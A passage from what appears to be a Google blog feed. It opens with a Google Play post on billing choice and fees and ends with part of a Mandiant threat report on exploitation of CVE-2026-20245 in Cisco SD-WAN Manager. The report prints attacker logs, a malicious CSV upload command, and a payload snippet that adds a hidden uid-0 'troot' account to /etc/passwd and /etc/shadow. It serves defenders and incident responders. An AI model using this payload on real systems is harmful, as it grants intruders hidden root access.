&lt;p&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0NArBxSwBOPGYLZKJ4BxhB3rjkTq6RrZ6XBJk2e57TVQ_mSCJ1nw5JAegk0dmX-MEW0ArHvvr2pX8zdXKuJjIXsTgDx7i9W-EoRtS0rHLeGPjMnOvryY2f02czLEBxANuCYYa9ryEr46_6xJ9PQNkHL1MWh-hEHwZAbCGYj-JcdCunZGva5WpFFHCtYA/s4210/Blogger%20Header%20asset%20-%204209%20x%201253%20px.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0NArBxSwBOPGYLZKJ4BxhB3rjkTq6RrZ6XBJk2e57TVQ_mSCJ1nw5JAegk0dmX-MEW0ArHvvr2pX8zdXKuJjIXsTgDx7i9W-EoRtS0rHLeGPjMnOvryY2f02czLEBxANuCYYa9ryEr46_6xJ9PQNkHL1MWh-hEHwZAbCGYj-JcdCunZGva5WpFFHCtYA/s16000/Blogger%20Header%20asset%20-%204209%20x%201253%20px.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;At Google Play, we are committed to delivering the best possible experience to users, while ensuring developers have the tools and adaptability to succeed. Guided by this commitment, &lt;a href="https://android-developers.googleblog.com/2026/03/a-new-era-for-choice-and-openness.html"&gt;earlier this year&lt;/a&gt; we announced updates to our business model introducing more billing flexibility, lower fees, and new programs to help your business thrive. &lt;br /&gt;&lt;br /&gt;With some of these changes rolling out soon, the breakdown below outlines what is coming, where to find more information, key dates, and how to get started.

&lt;h2&gt;More billing flexibility&lt;/h2&gt;

Google Play’s billing system safely, efficiently, and intuitively handles the complexities of taxes, compliance, and subscriptions across 195+ markets with 300+ local payment methods. However, we understand there are situations where your business needs more flexibility, and that's why we're offering you more options in how you handle digital commerce.&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicLIK5NuRI6Rf-N_scGYqy-xAMyFOrJRo-nJOjqBYQW3Fizevf5Mk3mKnNRlJWdEWKKQ3oM_whpPuVOABM9Nf8bZwkfGQ_12p4mgQDvO40ornXa_1OxyP_4okmNfbcOyXdq47nx7o11Q_D7BRe5nRBGt2tNWFhe_eAEIgFC-kFdZH8K8j0gfeWZUAuS1Y/s8000/MM6_Offer%20alt%20billing.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicLIK5NuRI6Rf-N_scGYqy-xAMyFOrJRo-nJOjqBYQW3Fizevf5Mk3mKnNRlJWdEWKKQ3oM_whpPuVOABM9Nf8bZwkfGQ_12p4mgQDvO40ornXa_1OxyP_4okmNfbcOyXdq47nx7o11Q_D7BRe5nRBGt2tNWFhe_eAEIgFC-kFdZH8K8j0gfeWZUAuS1Y/s16000/MM6_Offer%20alt%20billing.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;

&lt;br /&gt;&lt;br /&gt;Building from existing programs, the new billing choice program is available to all developers globally who provide digital services or content to users within the United Kingdom and the European Economic Area, alongside programs in the United States. Following this initial phase, we will continue expanding availability to additional markets. You will find the global release schedule at the bottom of this post.&lt;br /&gt;&lt;br /&gt;Through these programs, developers can offer an alternative billing system or link users to their own website for purchases, alongside Google Play’s billing. You may also design your own choice screen in accordance with our UX guidelines, as an alternative to Google Play’s default version.&lt;br /&gt;&lt;br /&gt;Please find all the details in the &lt;a href="https://support.google.com/googleplay/android-developer/answer/17161464"&gt;program page here&lt;/a&gt;.

&lt;h2&gt;Lower, separate fees&lt;/h2&gt;To enable this new level of flexibility, we're separating our service fee from the billing fee. This starts on June 30, 2026, beginning with the United States, European Economic Area, and United Kingdom.&lt;br /&gt;&lt;br /&gt;Regardless of whether you use Google Play's billing system, alternative billing, or external web links, the service fee starts at 10% on your first $1M (USD) in annual earnings. This 10% service fee also applies to all auto-renewing subscriptions. For all other transactions, the rates in the table below applies:&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaTaAgjv7m9xtS4DS25hgDQ6oMIQWBw-GQ0bDMv4D_J-W5r7njfSvs7EnSwnJNIZ9oOIqW0w8KqoA4tTOQ2kC_l4K1YsrGt9Dp-4PFKBJGoACzfZPCjE2KBB0PGBjpaWBCguanfdhd-86iPZ3nDL_tZsk-lSYINiyQAreP8HKzBuShqq0BepijI3X6LT0/s8000/MM6%20rate%20card%20without%20border.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaTaAgjv7m9xtS4DS25hgDQ6oMIQWBw-GQ0bDMv4D_J-W5r7njfSvs7EnSwnJNIZ9oOIqW0w8KqoA4tTOQ2kC_l4K1YsrGt9Dp-4PFKBJGoACzfZPCjE2KBB0PGBjpaWBCguanfdhd-86iPZ3nDL_tZsk-lSYINiyQAreP8HKzBuShqq0BepijI3X6LT0/s16000/MM6%20rate%20card%20without%20border.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

For other transactions, the service fee will be determined by whether the transacting user's install is new or existing relative to the regional rollout date:&lt;div&gt;&amp;nbsp;

&lt;ul&gt;
  &lt;li&gt;&lt;b&gt;New installs&lt;/b&gt;:&amp;nbsp;A transaction from a user whose first-time install or first update of the app from Google Play occurred on or after the date that the new fee structure launched in their region.&lt;/li&gt;
  &lt;li&gt;&lt;b&gt;Existing installs&lt;/b&gt;:&amp;nbsp;A transaction from a user whose first-time install or first update of the app from Google Play occurred before the date that the new fee structure launches in their market.&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;For transactions that use Google Play’s billing system, an additional billing fee applies. In the United States, United Kingdom, and the European Economic Area, the billing fee is set at 5%. We'll announce billing fee details for other markets soon. For transactions processed via alternative billing or external web links, the billing fee does not apply. &lt;br /&gt;&lt;br /&gt;Review&lt;a href="https://support.google.com/googleplay/android-developer/answer/16954621?hl=en"&gt; this Help Center article&lt;/a&gt; to understand how these rates apply to your business.

&lt;h2&gt;Games Level Up and Apps Experience program guidelines&lt;/h2&gt;We are also excited to announce even more opportunities for partners who deliver exceptional user experiences across the Android ecosystem: the revamped &lt;a href="https://play.google.com/console/about/levelup/"&gt;Games Level Up&lt;/a&gt; and the new &lt;a href="https://play.google.com/console/about/programs/appsexperience/"&gt;Apps Experience&lt;/a&gt; program. Detailed guidelines are now available on the respective program websites.&lt;br /&gt;&lt;br /&gt;Apps and games that meet all requirements are eligible for a new program rate card with reduced rates. See the table below for details:&lt;p&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6Zf6OFaB1B8MD7DeLJ-znJQUcA3ozQYDUEKzxiJb-32f_zk8bn6Cyi-WbwDPND0osW6FmmaUlfi1ji25thN3kZYXb747mD_KaE6pUf3faA5blqHNFH7qRlp0aNgVvS-bNNLg8L3QTizxXOU0mmblc8RyapiRanHcdocW92FchSLuJnw1HUSYbY2oJfNI/s8000/MM6%20rate%20card%20with%20border.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6Zf6OFaB1B8MD7DeLJ-znJQUcA3ozQYDUEKzxiJb-32f_zk8bn6Cyi-WbwDPND0osW6FmmaUlfi1ji25thN3kZYXb747mD_KaE6pUf3faA5blqHNFH7qRlp0aNgVvS-bNNLg8L3QTizxXOU0mmblc8RyapiRanHcdocW92FchSLuJnw1HUSYbY2oJfNI/s16000/MM6%20rate%20card%20with%20border.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;

Visit the &lt;a href="https://play.google.com/console/about/levelup/"&gt;Games Level Up&lt;/a&gt; and &lt;a href="https://play.google.com/console/about/programs/appsexperience/"&gt;Apps Experience&lt;/a&gt; program websites, review the guidelines, and start preparing your games and apps ahead of September 30, 2026, when the program rate cards officially become available.

&lt;h2&gt;Global release schedule&lt;/h2&gt;

Evolving our business model requires technical infrastructure and alignment with local regulations, so these updates will roll out on a staggered timeline. To help you plan, here is the previously announced release schedule for each update across all markets:&lt;p&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIGtrW01aFRzy0gj7_mHMrJ1TrWHkan3S0aF7HmjhM3QGdpkb9xjJudKp02b6i3jGGjRyE7PYGVPwxIhrM4CdLs_A-P70ugCns-G5x05x3PnAqD7VweBHg7-06bUl4T98OPuGpEXjrAjbwMObraQn8K3uCnr3tr505Os8Keu3H_i4wbWaZNoixFv6_vYw/s8000/MM6%20Release%20Schedule.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIGtrW01aFRzy0gj7_mHMrJ1TrWHkan3S0aF7HmjhM3QGdpkb9xjJudKp02b6i3jGGjRyE7PYGVPwxIhrM4CdLs_A-P70ugCns-G5x05x3PnAqD7VweBHg7-06bUl4T98OPuGpEXjrAjbwMObraQn8K3uCnr3tr505Os8Keu3H_i4wbWaZNoixFv6_vYw/s16000/MM6%20Release%20Schedule.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;

&lt;p&gt;Here is a quick recap of the resources available to help you get started:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Review the &lt;a href="https://support.google.com/googleplay/android-developer/answer/17161464"&gt;&lt;b&gt;billing choice program&lt;/b&gt;&lt;/a&gt;;&lt;/li&gt;
  &lt;li&gt;Learn more about &lt;a href="https://support.google.com/googleplay/android-developer/answer/16954621?hl=en"&gt;&lt;b&gt;Google Play's lower service fees&lt;/b&gt;&lt;/a&gt;;&lt;/li&gt;
  &lt;li&gt;Explore detailed guidelines on the &lt;a href="https://play.google.com/console/about/levelup/"&gt;&lt;b&gt;Games Level Up&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://play.google.com/console/about/programs/appsexperience/"&gt;&lt;b&gt;Apps Experience&lt;/b&gt;&lt;/a&gt; program websites.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We look forward to building the next generation of Google Play experiences together.&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://android-developers.googleblog.com/2026/06/play-expanded-billing.html" rel="alternate"/>
    <category term="Android Developers"/>
    <published>2026-06-24T14:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/platforms/google-pay/google-wallet-tsa</id>
    <title>Google Wallet makes TSA PreCheck Touchless ID available for more travelers</title>
    <updated>2026-06-24T13:00:00+00:00</updated>
    <content type="html">Illustration of a woman walking through an airport with a suitcase</content>
    <link href="https://blog.google/products-and-platforms/platforms/google-pay/google-wallet-tsa" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-24T13:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/platforms/google-pay/google-wallet-tsa/</id>
    <title>Google Wallet makes TSA PreCheck Touchless ID available for more travelers</title>
    <updated>2026-06-24T13:00:00+00:00</updated>
    <content type="html">Illustration of a woman walking through an airport with a suitcase</content>
    <link href="https://blog.google/products-and-platforms/platforms/google-pay/google-wallet-tsa/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-24T13:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/threat-intelligence/zero-day-exploitation-cisco-catalyst-sd-wan-manager</id>
    <title>Zero-Day Exploitation of Vulnerability (CVE-2026-20245) in Cisco Catalyst SD-WAN Manager</title>
    <updated>2026-06-24T11:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;Written by: Chester Sng, Pete Boonyakarn, Logeswaran Nadarajan, Lukasz Lamparski&lt;/p&gt;
&lt;hr /&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Introduction&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In early 2026, Mandiant identified a threat actor targeting SD-WAN infrastructure at a service provider. After gaining initial access, the threat actor exploited a zero-day vulnerability (&lt;/span&gt;&lt;a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-privesc-4uxFrdzx" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CVE-2026-20245&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;) in Cisco Catalyst SD-WAN to escalate privileges from a compromised administrative account to root-level access.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The vulnerability stems from the device’s file upload feature lacking the ability to properly filter malicious data.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Throughout the intrusion, to maintain operational security and avoid detection, the threat actor consistently employed anti-forensic techniques, selectively deleting and restoring system configuration files that were modified during their activities.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Key Observations&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Rogue Peering and Credential Manipulation&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: In March 2026, a threat actor established initial access via unauthorized peering connections to facilitate Secure Shell (SSH) access. The threat actor used that access to manipulate default account passwords to evade detection&lt;/span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Exploitation of CVE-2026-20245&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Subsequently, the attacker leveraged a zero-day privilege escalation vulnerability (now tracked as CVE-2026-20245) in Cisco Catalyst SD-WAN Manager to gain root-level access via a malicious CSV upload.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Extensive Anti-Forensic Cleanup&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: The threat actor deleted malicious files, reverted configuration changes, and executed a validation script to ensure indicators are purged&lt;/span&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;What is SD-WAN?&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Traditional Wide Area Networks (WANs) rely heavily on physical, proprietary hardware routers to direct traffic. This model is often rigid, complex to scale, and struggles to handle the demands of modern cloud computing.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Software-Defined Wide Area Network (SD-WAN) solves this by decoupling the network’s management and control logic from the underlying physical hardware. Instead of configuring individual routers one by one, a centralized software controller is used to orchestrate the entire network from a single dashboard. SD-WANs are typically used by highly distributed organizations, such as banks, retail corporations, technology services, and healthcare providers, to securely connect multiple remote branch locations directly to central cloud services&lt;/span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;What is Peering?&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Within an SD-WAN fabric, peering is the logical process of establishing a trusted, authenticated relationship between distinct network components, such as edge routers, regional hubs, and central controllers.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Before any data can be securely transmitted across the network fabric, these devices must perform a digital handshake. During the peering phase, devices mutually authenticate each other using cryptographic certificates. Once identity and trust are verified, they exchange underlying routing tables and automatically build secure tunnels to facilitate safe data transport. &lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Additional Vulnerabilities in Cisco Catalyst SD-WAN Controllers&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa-EHchtZk" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CVE-2026-20127&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa2-v69WY2SW" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CVE-2026-20182&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; are critical vulnerabilities recently disclosed by Cisco that affect the peering authentication mechanism for Cisco Catalyst SD-WAN controllers. Both vulnerabilities could allow an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Intrusion Campaign Overview&lt;/span&gt;&lt;/h3&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Initial Access Via Rogue Peering Connections&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;From late 2025 to January 2026, Mandiant observed multiple unauthorized peering connections to the victim’s SD-WAN Manager devices. It is possible that these connections occurred due to the exploitation of CVE-2026-20127 or CVE-2026-20182 as the vulnerabilities were not disclosed, and patches were not available during this period&lt;/span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Beginning in March 2026, further unauthorized peering connections were seen on a device running a software version unaffected by CVE-2026-20127. However, Cisco confirmed that these connections did not leverage CVE-2026-20182 either, and could instead be using stolen certificate material from a previous compromise of the same device.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;It is unclear if the same threat actor was responsible for the late 2025 to January 2026 and March 2026 rogue peering activity. &lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Successful Authentications By Altering The Admin Account Password&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In March 2026, the threat actor established new rogue peer connections and successfully authenticated to the SD-WAN Manager device via SSH using the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;vmanage-admin&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; account on the same victim devices.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once authenticated via SSH, the threat actor executed commands to change the password of the default &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;admin&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; account. The threat actor authenticated directly to the SD-WAN Manager web application interface using the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;admin&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; account and exfiltrated configurations of the SD-WAN fabric.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;[2026-03-07T01:31:48.464Z]"POST /j_security_check HTTP/1.1" 200 - 31 0 1288 - "&amp;lt;Threat Actor Control Plane IP&amp;gt;" "Mozilla/5.0" "&amp;lt;Log ID&amp;gt;" "&amp;lt;SD-WAN Manager IP&amp;gt;:8443" "127.0.0.1:8080"
[2026-03-07T01:31:49.017Z] "GET /dataservice/system/device/vedges HTTP/1.1" 200 - 0 10114 127 - "&amp;lt;Threat Actor Control Plane IP&amp;gt;" "Mozilla/5.0" "&amp;lt;Log ID&amp;gt;" "&amp;lt;SD-WAN Manager IP&amp;gt;:8443" "127.0.0.1:8080"
[2026-03-07T01:31:50.017Z] "GET /dataservice/system/device/controllers HTTP/1.1" 200 - 0 15815 100 - "&amp;lt;Threat Actor Control Plane IP&amp;gt;" "Mozilla/5.0" "&amp;lt;Log ID&amp;gt;" "&amp;lt;SD-WAN Manager IP&amp;gt;:8443" "127.0.0.1:8080"
[2026-03-07T01:31:51.925Z] "GET /dataservice/template/config/attached/&amp;lt;Device ID&amp;gt; HTTP/1.1" 200 - 0 3732 18 - "&amp;lt;Threat Actor Control Plane IP&amp;gt;" "Mozilla/5.0" "&amp;lt;Log ID&amp;gt;" "&amp;lt;SD-WAN Manager IP&amp;gt;:8443" "127.0.0.1:8080"
[2026-03-07T01:31:52.493Z] "GET /dataservice/template/config/running/&amp;lt;Device ID&amp;gt; HTTP/1.1" 400 - 0 134 19 - "&amp;lt;Threat Actor Control Plane IP&amp;gt;" "Mozilla/5.0" "&amp;lt;Log ID&amp;gt;" "&amp;lt;SD-WAN Manager IP&amp;gt;:8443" "127.0.0.1:8080"
&amp;lt;...&amp;gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 1: Threat actor authentication and configuration extraction&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The threat actor subsequently used their active &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;vmanage-admin&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; session to change the password of the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;admin&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; account back to its original state before terminating their active session. This activity was likely performed to reduce the probability of detection by an administrator trying to log into the device during day-to-day operations&lt;/span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;vmanage-admin&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;admin&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; accounts are default accounts on Cisco Catalyst SD-WAN controllers that have different privileges, but &lt;/span&gt;&lt;a href="https://www.cisco.com/c/en/us/td/docs/routers/sdwan/17-x/systems-interfaces/systems-interfaces-guide-17-x/users-and-access.html" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;neither possesses root shell access&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Exploitation of CVE-2026-20245 to Escalate Privileges&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Mandiant observed that in April 2026, &lt;/span&gt;after establishing an SSH session with the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;admin&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; account, the threat actor exploited CVE-2026-20245 by executing the following command to upload a file named &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;evil_tenant.csv&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;request tenant-upload tenant-list /home/admin/evil_tenant.csv vpn 0&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 2: Malicious file upload&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-privesc-4uxFrdzx" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CVE-2026-20245&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a vulnerability reported to Cisco by Mandiant, exists in the command-line interface (CLI) of Cisco Catalyst SD-WAN Controllers that could allow an authenticated, local attacker to execute arbitrary commands as root by supplying a crafted file to the affected system.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;evil_tenant.csv&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; file contains the exploit payload. The following code block (Figure 3) shows a snippet of the exploit which attempts to append malicious entries to the system's &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/etc/passwd&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/etc/shadow&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; files.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;if [ -e /usr/share/viptela/vbond_vsmart_tenant_list ] &amp;amp;&amp;amp; grep -q '&amp;lt;redacted&amp;gt;' /usr/share/viptela/vbond_vsmart_tenant_list 2&amp;gt;/dev/null; then
    echo absent &amp;gt; /home/admin/.orig_vbond_vsmart_tenant_list.state;
elif [ -e /usr/share/viptela/vbond_vsmart_tenant_list ]; then
    echo present &amp;gt; /home/admin/.orig_vbond_vsmart_tenant_list.state;
    cp -a /usr/share/viptela/vbond_vsmart_tenant_list /home/admin/.orig_vbond_vsmart_tenant_list;
else
    echo absent &amp;gt; /home/admin/.orig_vbond_vsmart_tenant_list.state;
fi;
cp -a /etc/passwd /home/admin/.orig_passwd;
cp -a /etc/shadow /home/admin/.orig_shadow;
grep -q '^troot:' /etc/passwd || echo 'troot:x:0:0:root:/root:/bin/bash' &amp;gt;&amp;gt; /etc/passwd;
grep -q '^troot:' /etc/shadow || echo 'troot:&amp;lt;redacted&amp;gt;:19000:0:99999:7:::' &amp;gt;&amp;gt; /etc/shadow&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 3: Appending malicious entries&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Through this command, the threat actor achieved the following:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Backed up the original &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;vbond_vsmart_tenant_list&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; configuration file, which would have been overwritten by the contents of &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;evil_tenant.csv&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; during the exploit. This backup was likely created to allow the actor to restore the file later, ensuring the SD-WAN Manager device did not load an invalid configuration that might alert administrators.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Created backups of the original &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/etc/passwd&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/etc/shadow&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; files.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Created a user account named &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;troot&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; with full root privileges.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
